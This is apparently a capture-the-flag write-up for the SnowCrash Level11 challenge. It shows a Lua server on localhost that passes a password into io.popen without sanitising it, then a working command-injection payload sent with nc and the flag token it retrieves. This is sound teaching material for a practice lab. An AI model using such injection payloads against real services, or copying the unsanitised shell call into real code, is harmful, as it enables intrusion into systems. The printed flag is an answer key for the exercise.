# Level11

- There is lua script in the home:
	It's a server bound to the `5151` port on the `localhost`.
	```lua
	level11@SnowCrash:~$ cat level11.lua
	local socket = require("socket")
	local server = assert(socket.bind("127.0.0.1", 5151))
	[...]
	function hash(pass)
	  prog = io.popen("echo "..pass.." | sha1sum", "r")
	[...]
	while 1 do
	  local client = server:accept()
	  client:send("Password: ")
	  client:settimeout(60)
	  local l, err = client:receive()
	[...]
	```
- We can see that we use popen which a library that can `pipe stream to or from a process`.
	You can view this like it can make us be able to call shell command piping.
- Don't forget that lua is a scripting language. And there is no input sanitize.
	We can just escape the string and inject code to be executed in there.
	```
	level11@SnowCrash:~$ nc localhost 5151
	Password: \";getflag > /tmp/token;\"
	Erf nope..
	level11@SnowCrash:~$ cat /tmp/token
	Check flag.Here is your token : fa6v5ateaw21peobuub8ipe6s
	```
